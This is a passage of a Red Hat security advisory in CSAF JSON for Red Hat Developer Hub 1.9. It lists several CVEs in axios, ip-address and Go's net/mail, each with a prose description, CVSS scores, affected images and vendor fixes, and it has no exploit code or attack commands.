"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42044"
},
{
"category": "external",
"summary": "RHBZ#2461624",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461624"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42044",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42044"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23",
"url": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23"
}
],
"release_date": "2026-04-24T17:49:49.517000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget"
},
{
"cve": "CVE-2026-42338",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-05-12T21:01:14.436876+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2476810"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ip-address, a JavaScript library for parsing and manipulating IPv4 and IPv6 addresses. This vulnerability allows a remote attacker to perform cross-site scripting (XSS) by providing untrusted input to the Address6 constructor. When an application renders the output of Address6.group(), Address6.link(), or the AddressError.parseMessage as HTML without proper escaping, the attacker-controlled content can be executed in the user\u0027s browser.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ip-address: ip-address: Cross-site scripting via improper HTML escaping of untrusted input",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42338"
},
{
"category": "external",
"summary": "RHBZ#2476810",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2476810"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42338",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42338"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42338",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42338"
},
{
"category": "external",
"summary": "https://github.com/beaugunderson/ip-address/security/advisories/GHSA-v2v4-37r5-5v8g",
"url": "https://github.com/beaugunderson/ip-address/security/advisories/GHSA-v2v4-37r5-5v8g"
}
],
"release_date": "2026-05-12T19:43:16.470000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ip-address: ip-address: Cross-site scripting via improper HTML escaping of untrusted input"
},
{
"cve": "CVE-2026-42499",
"cwe": {
"id": "CWE-1046",
"name": "Creation of Immutable Text Using String Concatenation"
},
"discovery_date": "2026-05-07T20:00:51.685602+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467809"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `net/mail` package within the Go standard library. A remote attacker could provide specially crafted, pathological email addresses. When these malformed email addresses are parsed by the `consumePhrase` function, it can lead to excessive resource consumption due to quadratic string concatenation, resulting in a Denial of Service (DoS) condition.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net/mail: golang: net/mail: Denial of Service via pathological email address parsing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the `net/mail` package of the Go standard library. A remote attacker can exploit this flaw by sending specially crafted email addresses, leading to excessive resource consumption and a denial of service in Go applications that parse email addresses using the affected library.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42499"
},
{
"category": "external",
"summary": "RHBZ#2467809",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467809"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42499",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42499"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42499",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42499"
},
{
"category": "external",
"summary": "https://go.dev/cl/771520",
"url": "https://go.dev/cl/771520"
},
{
"category": "external",
"summary": "https://go.dev/issue/78987",
"url": "https://go.dev/issue/78987"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M",
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4977",
"url": "https://pkg.go.dev/vuln/GO-2026-4977"
}
],
"release_date": "2026-05-07T19:41:18.615000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net/mail: golang: net/mail: Denial of Service via pathological email address parsing"
},
{
"cve": "CVE-2026-44486",
"cwe": {
"id": "CWE-201",
"name": "Insertion of Sensitive Information Into Sent Data"
},
"discovery_date": "2026-06-11T17:01:30.944384+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487947"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a promise-based HTTP client, specifically in its Node.js HTTP adapter. When Axios is configured to use an authenticated proxy and follows a redirect, it may inadvertently send the Proxy-Authorization header, containing proxy credentials, to the redirect target. This can lead to the disclosure of sensitive proxy credentials to an unintended remote server.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Information disclosure of proxy credentials via HTTP redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44486"
},
{
"category": "external",
"summary": "RHBZ#2487947",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487947"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44486",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44486"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44486",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44486"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-j5f8-grm9-p9fc",
"url": "https://github.com/axios/axios/security/advisories/GHSA-j5f8-grm9-p9fc"
}
],
"release_date": "2026-06-11T15:39:07.714000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Information disclosure of proxy credentials via HTTP redirects"
},
{
"cve": "CVE-2026-44487",
"cwe": {
"id": "CWE-201",
"name": "Insertion of Sensitive Information Into Sent Data"
},
"discovery_date": "2026-06-11T17:01:34.091476+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487948"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios. During specific proxy-to-direct redirect flows in the Node.js HTTP adapter, a remote attacker could exploit this vulnerability. The Proxy-Authorization header, which contains proxy credentials and is intended only for the outbound proxy, may be forwarded to the final redirected origin. This can lead to the disclosure of sensitive proxy credentials to an unintended third party.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Information disclosure of proxy credentials via redirect flows",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44487"
},
{
"category": "external",
"summary": "RHBZ#2487948",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487948"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44487"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44487",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44487"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-p92q-9vqr-4j8v",
"url": "https://github.com/axios/axios/security/advisories/GHSA-p92q-9vqr-4j8v"
}
],
"release_date": "2026-06-11T15:38:25.150000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Information disclosure of proxy credentials via redirect flows"
},
{
"cve": "CVE-2026-44488",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-11T17:01:36.836488+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487949"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a promise-based HTTP client. When using the fetch adapter, Axios did not properly enforce configured request and response size limits. This vulnerability allows a remote attacker, through a malicious or compromised server, or by supplying a large data URL, to send or receive oversized data bodies. This can lead to resource exhaustion in server-side applications, resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Denial of Service due to unenforced request and response size limits",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44488"
},
{
"category": "external",
"summary": "RHBZ#2487949",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487949"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44488",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44488"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44488",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44488"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-777c-7fjr-54vf",
"url": "https://github.com/axios/axios/security/advisories/GHSA-777c-7fjr-54vf"
}
],
"release_date": "2026-06-11T15:37:38.013000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Denial of Service due to unenforced request and response size limits"
},
{
"cve": "CVE-2026-44492",
"cwe": {
"id": "CWE-289",
"name": "Authentication Bypass by Alternate Name"
},
"discovery_date": "2026-06-11T17:00:56.761751+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
